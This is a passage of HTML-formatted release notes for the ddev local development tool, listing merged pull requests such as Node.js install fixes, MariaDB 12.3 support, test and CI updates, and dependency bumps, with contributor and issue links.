<li>feat(docker-rootless): remove no-bind-mounts requirement, test gvisor-tap-vsock by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512197309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8426" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8426/hovercard" href="https://github.com/ddev/ddev/pull/8426">#8426</a></li>
<li>build: pin Node.js to 24.15.0, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555564450" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8436" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8436/hovercard" href="https://github.com/ddev/ddev/issues/8436">#8436</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4557653464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8438" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8438/hovercard" href="https://github.com/ddev/ddev/pull/8438">#8438</a></li>
<li>test(linux): wait for nc to bind before asserting in port-diagnose tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4577688152" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8446" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8446/hovercard" href="https://github.com/ddev/ddev/pull/8446">#8446</a></li>
<li>test: rework local HTTP test helpers with clearer failure output by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581438165" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8447" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8447/hovercard" href="https://github.com/ddev/ddev/pull/8447">#8447</a></li>
<li>fix(nodejs): move install to Dockerfile, add ~/n/bin to PATH, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4447652737" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8414" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8414/hovercard" href="https://github.com/ddev/ddev/issues/8414">#8414</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4447694768" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8415" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8415/hovercard" href="https://github.com/ddev/ddev/issues/8415">#8415</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565282332" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8443" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8443/hovercard" href="https://github.com/ddev/ddev/pull/8443">#8443</a></li>
<li>fix(zensical): retry strict build on false-positive "page does not exist" warnings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597532685" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8451" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8451/hovercard" href="https://github.com/ddev/ddev/pull/8451">#8451</a></li>
<li>ci(linux): use full homebrew formulae name, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589599706" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8450" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8450/hovercard" href="https://github.com/ddev/ddev/issues/8450">#8450</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612159727" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8455" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8455/hovercard" href="https://github.com/ddev/ddev/pull/8455">#8455</a></li>
<li>test(quickstart): update asterios page check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612039963" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8454" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8454/hovercard" href="https://github.com/ddev/ddev/pull/8454">#8454</a></li>
<li>feat: add MariaDB 12.3 LTS support, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604820646" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8452" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8452/hovercard" href="https://github.com/ddev/ddev/issues/8452">#8452</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4607401729" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8453" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8453/hovercard" href="https://github.com/ddev/ddev/pull/8453">#8453</a></li>
<li>fix(dbserver): use wrapper scripts for MariaDB 11.x+ MySQL compat, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2760145770" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6861" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6861/hovercard" href="https://github.com/ddev/ddev/issues/6861">#6861</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614529441" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8456" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8456/hovercard" href="https://github.com/ddev/ddev/pull/8456">#8456</a></li>
<li>test(buildkite): Fix brew upgrade to use -y for new 6.0.0 release, fix setup-homebrew by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642259004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8469/hovercard" href="https://github.com/ddev/ddev/pull/8469">#8469</a></li>
<li>build(gnupg): Remove references to obsolete gnupg2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656275880" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8475" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8475/hovercard" href="https://github.com/ddev/ddev/pull/8475">#8475</a></li>
<li>fix: recreate service on <code>ddev utility rebuild -s</code>, support profile services by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4630837333" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8463" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8463/hovercard" href="https://github.com/ddev/ddev/pull/8463">#8463</a></li>
<li>fix(nodejs): preserve nodejs_version in config.yaml, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4002111935" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8186" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8186/hovercard" href="https://github.com/ddev/ddev/issues/8186">#8186</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624943154" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8462" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8462/hovercard" href="https://github.com/ddev/ddev/pull/8462">#8462</a></li>
<li>fix(nodejs): move N_PREFIX to /usr/local/n and make it writable, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632809900" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8465" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8465/hovercard" href="https://github.com/ddev/ddev/issues/8465">#8465</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635081802" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8467" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8467/hovercard" href="https://github.com/ddev/ddev/pull/8467">#8467</a></li>
<li>fix(nginx): suppress favicon.ico and robots.txt 404 logs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2869143534" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7010" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7010/hovercard" href="https://github.com/ddev/ddev/issues/7010">#7010</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624409272" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8461" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8461/hovercard" href="https://github.com/ddev/ddev/pull/8461">#8461</a></li>
<li>fix(ssh): use RawCmd to avoid double-sourcing bashrc, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1835843764" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5232" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5232/hovercard" href="https://github.com/ddev/ddev/issues/5232">#5232</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624030279" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8460" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8460/hovercard" href="https://github.com/ddev/ddev/pull/8460">#8460</a></li>
<li>docs: install util-linux-extra in Docker setup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332343177" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8350" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8350/hovercard" href="https://github.com/ddev/ddev/issues/8350">#8350</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4666141620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8480/hovercard" href="https://github.com/ddev/ddev/pull/8480">#8480</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4666141620" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8480/hovercard" href="https://github.com/ddev/ddev/pull/8480">#8480</a></li>
<li>feat: improve ddev list/describe table layout, add OSC 8 terminal hyperlinks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1991790083" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5535" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5535/hovercard" href="https://github.com/ddev/ddev/issues/5535">#5535</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2249382464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6113" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6113/hovercard" href="https://github.com/ddev/ddev/issues/6113">#6113</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653278220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8474/hovercard" href="https://github.com/ddev/ddev/pull/8474">#8474</a>)  [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653278220" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8474/hovercard" href="https://github.com/ddev/ddev/pull/8474">#8474</a></li>
<li>fix: skip OS-generated metadata files in custom-config detection and .ddev/.gitignore, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475692720" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8418" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8418/hovercard" href="https://github.com/ddev/ddev/issues/8418">#8418</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665439123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8478/hovercard" href="https://github.com/ddev/ddev/pull/8478">#8478</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665439123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8478" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8478/hovercard" href="https://github.com/ddev/ddev/pull/8478">#8478</a></li>
<li>fix(mutagen): detect missing docker CLI early, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614824791" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8457" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8457/hovercard" href="https://github.com/ddev/ddev/issues/8457">#8457</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665774207" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8479" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8479/hovercard" href="https://github.com/ddev/ddev/pull/8479">#8479</a></li>
<li>docs(docker): add troubleshooting for permission denied, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4645427389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8471" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8471/hovercard" href="https://github.com/ddev/ddev/issues/8471">#8471</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675675317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8483/hovercard" href="https://github.com/ddev/ddev/pull/8483">#8483</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675675317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8483/hovercard" href="https://github.com/ddev/ddev/pull/8483">#8483</a></li>
<li>test(quickstart): update shopware6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675529151" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8482/hovercard" href="https://github.com/ddev/ddev/pull/8482">#8482</a></li>
<li>fix: warn when CAROOT is set but CA files are inaccessible, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677876085" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8485" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8485/hovercard" href="https://github.com/ddev/ddev/issues/8485">#8485</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678327612" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8486/hovercard" href="https://github.com/ddev/ddev/pull/8486">#8486</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678327612" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8486/hovercard" href="https://github.com/ddev/ddev/pull/8486">#8486</a></li>
<li>fix(tui): prevent docker/cli stdin from consuming TUI shortcuts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562065445" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8440" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8440/hovercard" href="https://github.com/ddev/ddev/issues/8440">#8440</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685382113" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8489" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8489/hovercard" href="https://github.com/ddev/ddev/pull/8489">#8489</a></li>
<li>fix: add /usr/local/n/bin to sudo secure_path, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685293783" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8488" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8488/hovercard" href="https://github.com/ddev/ddev/issues/8488">#8488</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685872989" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8490" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8490/hovercard" href="https://github.com/ddev/ddev/pull/8490">#8490</a></li>
<li>fix(start): show warnings from log-stderr.sh on start, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4563471219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8441" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8441/hovercard" href="https://github.com/ddev/ddev/issues/8441">#8441</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675066040" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8481" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8481/hovercard" href="https://github.com/ddev/ddev/pull/8481">#8481</a></li>
<li>build(deps): bump go dependencies, migrate to go-github v88 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694258253" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8492" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8492/hovercard" href="https://github.com/ddev/ddev/pull/8492">#8492</a></li>
<li>test(quickstart): pin <code>@sveltejs/adapter-node@5.5.4</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701858950" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8497/hovercard" href="https://github.com/ddev/ddev/pull/8497">#8497</a></li>
<li>test(docs): Ignore link check URLs [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702819191" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8499" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8499/hovercard" href="https://github.com/ddev/ddev/pull/8499">#8499</a></li>
<li>build: bump actions/checkout from 6 to 7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718149342" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8504" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8504/hovercard" href="https://github.com/ddev/ddev/pull/8504">#8504</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718149342" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8504" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8504/hovercard" href="https://github.com/ddev/ddev/pull/8504">#8504</a></li>
<li>fix: restrict XDG_CONFIG_HOME to Linux, add DDEV_XDG_CONFIG_HOME for cross-platform overrides, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694586960" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8493" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8493/hovercard" href="https://github.com/ddev/ddev/issues/8493">#8493</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694816575" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8494" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8494/hovercard" href="https://github.com/ddev/ddev/pull/8494">#8494</a></li>
<li>fix(webserver): prevent recursion in global web command wrappers, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2790468327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6902" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6902/hovercard" href="https://github.com/ddev/ddev/pull/6902">#6902</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701412145" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8495" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8495/hovercard" href="https://github.com/ddev/ddev/pull/8495">#8495</a></li>
<li>fix(nodejs): always install gulp-cli and yarn, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701417432" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8496" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8496/hovercard" href="https://github.com/ddev/ddev/issues/8496">#8496</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702408419" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8498" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8498/hovercard" href="https://github.com/ddev/ddev/pull/8498">#8498</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702408419" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8498" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8498/hovercard" href="https://github.com/ddev/ddev/pull/8498">#8498</a></li>
<li>feat(windows): support Debian and Kali WSL2 distros in GUI installer, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4559357943" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8439" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8439/hovercard" href="https://github.com/ddev/ddev/issues/8439">#8439</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641003281" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8468" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8468/hovercard" href="https://github.com/ddev/ddev/issues/8468">#8468</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632394063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8464" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8464/hovercard" href="https://github.com/ddev/ddev/pull/8464">#8464</a></li>
<li>build: Fix gomt error that crept in [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721491247" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8509" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8509/hovercard" href="https://github.com/ddev/ddev/pull/8509">#8509</a></li>
<li>test: Add script to compare start time performance [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721622618" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8510" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8510/hovercard" href="https://github.com/ddev/ddev/pull/8510">#8510</a></li>
